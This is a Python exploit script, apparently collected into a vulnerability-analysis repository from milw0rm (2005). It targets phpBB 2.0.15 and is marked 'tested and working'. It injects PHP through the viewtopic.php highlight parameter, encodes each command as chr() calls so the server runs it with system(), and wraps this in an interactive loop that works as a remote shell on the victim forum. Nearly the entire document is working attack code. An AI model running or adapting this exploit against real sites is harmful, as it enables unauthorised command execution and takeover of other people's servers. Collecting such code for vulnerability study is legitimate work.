lilbool/vuln-code-analysis
0
1# tested and working /str0ke
2
3#!/usr/bin/pyth0n
4#
5############################################################### this exploit for
6 # phpBB 2.0.15
7print "\nphpBB 2.0.15 arbitrary command execution eXploit" # emulates a shell,
8print " 2005 by rattle@awarenetwork.org" # rather than
9print " well, just because there is none." # sending a single
10 # command.
11import sys ####
12from urllib2 import Request, urlopen
13from urlparse import urlparse, urlunparse
14from urllib import quote as quote_plus
15
16INITTAG = '<g0>'
17ENDTAG = '</g0>'
18
19def makecmd(cmd):
20 return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))
21
22
23_ex = "%sviewtopic.php?t=%s&highlight=%%27."
24_ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
25_ex += "printf(" + makecmd(ENDTAG) + ").%%27"
26
27
28def usage():
29 print """Usage: %s <forum> <topic>
30
31 forum - fully qualified url to the forum
32 example: http://www.host.com/phpBB/
33
34 topic - ID of an existing topic. Well you
35 will have to check yourself.
36
37"""[:-1] % sys.argv[0]; sys.exit(1)
38
39
40if __name__ == '__main__':
41
42 if len(sys.argv) < 3 or not sys.argv[2].isdigit():
43 usage()
44 else:
45 print
46 url = sys.argv[1]
47 if url.count("://") == 0:
48 url = "http://" + url
49 url = list(urlparse(url))
50 host = url[1]
51 if not host: usage()
52
53 if not url[0]: url[0] = 'http'
54 if not url[2]: url[2] = '/'
55 url[3] = url[4] = url[5] = ''
56
57 url = urlunparse(url)
58 if url[-1] != '/': url += '/'
59
60 topic = quote_plus((sys.argv[2]))
61
62 while 1:
63
64 try:
65 cmd = raw_input("[%s]$ " % host).strip()
66 if cmd[-1]==';': cmd=cmd[:-1]
67
68 if (cmd == "exit"): break
69 else: cmd = makecmd(cmd)
70
71 out = _ex % (url,topic,cmd)
72
73 try: ret = urlopen(Request(out)).read()
74 except KeyboardInterrupt: continue
75 except: pass
76
77 else:
78 ret = ret.split(INITTAG,1)
79 if len(ret)>1: ret = ret[1].split(ENDTAG,1)
80 if len(ret)>1:
81 ret = ret[0].strip();
82 if ret: print ret
83 continue;
84
85 print "EXPLOIT FAILED"
86
87 except:
88 continue
89
90# milw0rm.com [2005-06-29]